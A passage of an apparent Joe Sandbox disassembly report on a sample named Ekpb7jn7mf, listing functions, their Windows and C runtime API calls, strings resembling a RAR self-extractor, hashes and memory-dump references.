                                                                                  • Opcode ID: 6a88fec46c6e2ed339dc460f0013721632dfbcda676ebdc8d99927cb56d757a2
                                                                                  • Instruction ID: fed5c536f3b2b7c610a00bc298727fa3e828a9ff45da11d674a63ad0a1871450
                                                                                  • Opcode Fuzzy Hash: 6a88fec46c6e2ed339dc460f0013721632dfbcda676ebdc8d99927cb56d757a2
                                                                                  • Instruction Fuzzy Hash: D951827280011CABDB21DB61DC44BEE77B9BB04308F4444BBE709A3191E7799AA98B59
                                                                                  Function 00418F4D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00418F58
                                                                                  • _malloc.LIBCMT ref: 00418F66
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _wcscpy.LIBCMT ref: 00418F84
                                                                                  • _wcslen.LIBCMT ref: 00418F8A
                                                                                  • _wcscpy.LIBCMT ref: 00418FD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy_wcslen$AllocateHeap_malloc
                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 2405444336-406990186
                                                                                  • Opcode ID: a39a975298e6c280c7f418a7708ae3b0cba04351458a02580fee1fe22ee1b99d
                                                                                  • Instruction ID: 8ed00ed3361364beb19460b19ebaa28e3934aa6a6d72a9a41527c955c98881c6
                                                                                  • Opcode Fuzzy Hash: a39a975298e6c280c7f418a7708ae3b0cba04351458a02580fee1fe22ee1b99d
                                                                                  • Instruction Fuzzy Hash: 85212872944304ABDB20AF54DC41ADA77B5EF44328B21041FE441A7291EBBCADE2839E
                                                                                  Function 0040F324 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F38D
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0040F3A2
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0040F3B1
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F3C6
                                                                                  • GetSysColor.USER32(0000000F), ref: 0040F3CA
                                                                                  • SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F3DA
                                                                                  • SetForegroundWindow.USER32(?), ref: 0040F3F4
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040F427
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Item$ColorDialogForegroundWindow
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 3794146707-2177901306
                                                                                  • Opcode ID: 5bf4323c514809b6aac91268663061aef5a0f9b8203f86075640bcbbe7bd9289
                                                                                  • Instruction ID: b3d4d6040a58ead9781f4e0a9c08f90d7aa975f3480a485700ae2804d7b30663
                                                                                  • Opcode Fuzzy Hash: 5bf4323c514809b6aac91268663061aef5a0f9b8203f86075640bcbbe7bd9289
                                                                                  • Instruction Fuzzy Hash: 52210B71200204BBDB31AFA1EC49F6B3BADFB59B14F409436FE05A51E1C6798865DB2C
                                                                                  Function 0040DA71 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindow.USER32(?,00000005), ref: 0040DA91
                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0040DACA
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0040DAE8
                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040DAFF
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0040DB0E
                                                                                    • Part of subcall function 00419B88: GetDC.USER32(00000000), ref: 00419B94
                                                                                    • Part of subcall function 00419B88: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00419BA3
                                                                                    • Part of subcall function 00419B88: ReleaseDC.USER32(00000000,00000000), ref: 00419BB1
                                                                                    • Part of subcall function 00419B45: GetDC.USER32(00000000), ref: 00419B51
                                                                                    • Part of subcall function 00419B45: GetDeviceCaps.GDI32(00000000,00000058), ref: 00419B60
                                                                                    • Part of subcall function 00419B45: ReleaseDC.USER32(00000000,00000000), ref: 00419B6E
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040DB35
                                                                                  • DeleteObject.GDI32(00000000), ref: 0040DB40
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040DB49
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 1444658586-1882779555
                                                                                  • Opcode ID: 9c39359ee33ba118c9e5bf82dadea384c3cf2197b7365b4ccf5d0ba242f48d8d
                                                                                  • Instruction ID: b2011dbba9a3bc3ba255de89cafec419f36bdcf8549ad9effb89a34e701b2038
                                                                                  • Opcode Fuzzy Hash: 9c39359ee33ba118c9e5bf82dadea384c3cf2197b7365b4ccf5d0ba242f48d8d
                                                                                  • Instruction Fuzzy Hash: 8D21D631E40204BBDB21ABA4DC86FEF7378AB41B44F414026FE04B61C1DB7CA946966D
                                                                                  Function 0040BDCF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
                                                                                  • String ID: %08x
                                                                                  • API String ID: 3224783807-3682738293
                                                                                  • Opcode ID: bbdd19f016625eef11faa4fdbd5798c0b2f9fd945c0c283110aeb49f0b8415de
                                                                                  • Instruction ID: 2344540725ce6d90efac3d14ec0117aaa2fc99d666fc041b412929bc598a6daf
                                                                                  • Opcode Fuzzy Hash: bbdd19f016625eef11faa4fdbd5798c0b2f9fd945c0c283110aeb49f0b8415de
                                                                                  • Instruction Fuzzy Hash: FD41D7325102196ADB24AA65DC81AFB33ACDB40354F50043BFA05E72D1EB7CDD9096EE
                                                                                  Function 0040A566 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040A42F: _wcsrchr.LIBCMT ref: 0040A443
                                                                                  • _wcslen.LIBCMT ref: 0040A59C
                                                                                  • _wcscpy.LIBCMT ref: 0040A5D1
                                                                                    • Part of subcall function 0041097E: _wcslen.LIBCMT ref: 00410984
                                                                                    • Part of subcall function 0041097E: _wcsncat.LIBCMT ref: 0041099D
                                                                                  • _wcslen.LIBCMT ref: 0040A611
                                                                                  • _wcscpy.LIBCMT ref: 0040A683
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                  • API String ID: 1023950463-630704357
                                                                                  • Opcode ID: 3e273efd549707747d43a6a5138d94cb353cae60e4e02cf3af8f5c99256b3f59
                                                                                  • Instruction ID: f83e943ddf972e8f8a22e2eb52403a1e06515caeb65f170328b258566fe773e3
                                                                                  • Opcode Fuzzy Hash: 3e273efd549707747d43a6a5138d94cb353cae60e4e02cf3af8f5c99256b3f59
                                                                                  • Instruction Fuzzy Hash: 2B312821104310A9C725AB219C56A7B73B89F15758B690C2FF8C2BB1D2E77D8CF2825F
                                                                                  Function 004193B0 Relevance: 13.6, APIs: 9, Instructions: 133windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004193C9
                                                                                  • GetTickCount.KERNEL32 ref: 004193E4
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004193F8
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419409
                                                                                  • TranslateMessage.USER32(?), ref: 00419413
                                                                                  • DispatchMessageW.USER32(?), ref: 0041941D
                                                                                  • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000204,?), ref: 004194BD
                                                                                  • ShowWindow.USER32(?,00000005), ref: 004194C8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004194D2
                                                                                    • Part of subcall function 0041A27A: __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041A27A: ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                    • Part of subcall function 0041A27A: ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                    • Part of subcall function 0041A27A: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                    • Part of subcall function 0041A27A: GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Window$CountTick$DispatchErrorFreeHeapLastPeekShowTextTranslate___sbh_find_block___sbh_free_block__lock
                                                                                  • String ID:
                                                                                  • API String ID: 1762286965-0
                                                                                  • Opcode ID: 968d995a82d5f0ea48cefb7abe764611dda9416a2252b86e5235ea0c7dc78474
                                                                                  • Instruction ID: 87a789d033c7877a5d6241aac1848da5b39df01b2a251d2073d25f1852c58bae
                                                                                  • Opcode Fuzzy Hash: 968d995a82d5f0ea48cefb7abe764611dda9416a2252b86e5235ea0c7dc78474
                                                                                  • Instruction Fuzzy Hash: 0B413871A00218BFCB20DFA5C8889DEBBB9FF48755B14845AF905D7250D734DE82CBA4
                                                                                  Function 0040840E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408413
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00408436
                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00408455
                                                                                    • Part of subcall function 0040A2A0: _wcslen.LIBCMT ref: 0040A2A6
                                                                                    • Part of subcall function 00411BD1: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409BC8,?,00000000,?,00409CE2,00000000,-00000002,?,00000000,?), ref: 00411BE7
                                                                                  • _swprintf.LIBCMT ref: 004084ED
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • MoveFileW.KERNEL32(?,00000000), ref: 00408559
                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 0040859C
                                                                                    • Part of subcall function 00410951: _wcsncpy.LIBCMT ref: 00410968
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
                                                                                  • String ID: rtmp%d
                                                                                  • API String ID: 506780119-3303766350
                                                                                  • Opcode ID: 9dcb41b66bc9883f639689ce326a7a0d157b8eb283d37bb684c103709a5e220b
                                                                                  • Instruction ID: db8d7cd9f858afa19c11e334fa89902149cdf40e0c37418c1c820aad0f31ba4e
                                                                                  • Opcode Fuzzy Hash: 9dcb41b66bc9883f639689ce326a7a0d157b8eb283d37bb684c103709a5e220b
                                                                                  • Instruction Fuzzy Hash: 28418371901219AACF20EB61CE45ADF777CAF10394F0008BBB585B7181DB7C9B85CE69
                                                                                  Function 0040A6EC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
                                                                                  • String ID: %c:\$%s.%d.tmp
                                                                                  • API String ID: 2474501127-1021493711
                                                                                  • Opcode ID: ec3a0a4596e00cb2bd479afa27f59465cb09bd272ae950c19ad5ae875a8a0cfc
                                                                                  • Instruction ID: 727a68eb672255717b6b5494873d0d1786742a6971a417f2f569041ee214a428
                                                                                  • Opcode Fuzzy Hash: ec3a0a4596e00cb2bd479afa27f59465cb09bd272ae950c19ad5ae875a8a0cfc
                                                                                  • Instruction Fuzzy Hash: 5B01262214430179D6206B369C45D6B63FCDFC6760B00C83FF495E71C1EA38D4A0827B
                                                                                  Function 00419045 Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00419057
                                                                                  • GetTickCount.KERNEL32 ref: 0041905C
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041908B
                                                                                  • TranslateMessage.USER32(?), ref: 00419099
                                                                                  • DispatchMessageW.USER32(?), ref: 004190A3
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004190B0
                                                                                  • GetTickCount.KERNEL32 ref: 004190B6
                                                                                  • VariantInit.OLEAUT32(?), ref: 004190C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                                                  • String ID:
                                                                                  • API String ID: 4242828014-0
                                                                                  • Opcode ID: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
                                                                                  • Instruction ID: 4142cfbcc9d42b04f7e144a74b6bfb23a0da8fc7efe1de3e111f6bf35689ebcd
                                                                                  • Opcode Fuzzy Hash: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
                                                                                  • Instruction Fuzzy Hash: 0D211871A00208AFDB10EFE4D888DEEBBBCEF48304F444466F902E7250D7359E458B65
                                                                                  Function 00419C15 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 184comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00419BEA: GetDC.USER32(00000000), ref: 00419BEE
                                                                                    • Part of subcall function 00419BEA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00419BF9
                                                                                    • Part of subcall function 00419BEA: ReleaseDC.USER32(00000000,00000000), ref: 00419C04
                                                                                  • GetObjectW.GDI32(00000200,00000018,?), ref: 00419C42
                                                                                  • CoCreateInstance.OLE32(0042B198,00000000,00000001,0042B090,?,00000000,?), ref: 00419C72
                                                                                    • Part of subcall function 00419A80: GetDC.USER32(00000000), ref: 00419A8C
                                                                                    • Part of subcall function 00419A80: CreateCompatibleDC.GDI32(00000000), ref: 00419A9C
                                                                                    • Part of subcall function 00419A80: CreateCompatibleDC.GDI32(?), ref: 00419AA3
                                                                                    • Part of subcall function 00419A80: GetObjectW.GDI32(?,00000018,?), ref: 00419AB1
                                                                                    • Part of subcall function 00419A80: CreateCompatibleBitmap.GDI32(?,00000200,00419C32), ref: 00419AD3
                                                                                    • Part of subcall function 00419A80: SelectObject.GDI32(00000000,?), ref: 00419AE6
                                                                                    • Part of subcall function 00419A80: SelectObject.GDI32(?,00000200), ref: 00419AF1
                                                                                    • Part of subcall function 00419A80: StretchBlt.GDI32(?,00000000,00000000,00000200,00419C32,00000000,00000000,00000000,?,?,00CC0020), ref: 00419B0F
                                                                                    • Part of subcall function 00419A80: SelectObject.GDI32(00000000,?), ref: 00419B19
                                                                                    • Part of subcall function 00419A80: SelectObject.GDI32(?,00419C32), ref: 00419B21
                                                                                    • Part of subcall function 00419A80: DeleteDC.GDI32(00000000), ref: 00419B2A
                                                                                    • Part of subcall function 00419A80: DeleteDC.GDI32(?), ref: 00419B2F
                                                                                    • Part of subcall function 00419A80: ReleaseDC.USER32(00000000,?), ref: 00419B35
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateSelect$Compatible$DeleteRelease$BitmapCapsDeviceInstanceStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 189428636-3887548279
                                                                                  • Opcode ID: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
                                                                                  • Instruction ID: 1c890768cb5db6e66f006307fd37330ab6d2cddd525e733737a617503357ad66
                                                                                  • Opcode Fuzzy Hash: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
                                                                                  • Instruction Fuzzy Hash: D6611B75A00209AFCB00CFA5D898EDEBBB9FF89704B10845AF805EB250D775EE51CB64
                                                                                  Function 004191F2 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 004191FE
                                                                                  • _malloc.LIBCMT ref: 00419208
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc_wcslen
                                                                                  • String ID: </p>$</style>$<br>$<style>
                                                                                  • API String ID: 4208083856-1200123991
                                                                                  • Opcode ID: e47da76aa666f223b291d0612afcac6699497b395e112ade81621d912ae806f1
                                                                                  • Instruction ID: a46fc352e4e2975e8ee3fcdf14dd3711f762a1eade3d454cba8f8919515b0d7c
                                                                                  • Opcode Fuzzy Hash: e47da76aa666f223b291d0612afcac6699497b395e112ade81621d912ae806f1
                                                                                  • Instruction Fuzzy Hash: 2A411335648256B5DF305B698821BF633A4EF4A750F28488BED81972C0E77C9DC2C25E
                                                                                  Function 0040D7DD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040D7F1
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _wcslen.LIBCMT ref: 0040D831
                                                                                  • _wcscat.LIBCMT ref: 0040D848
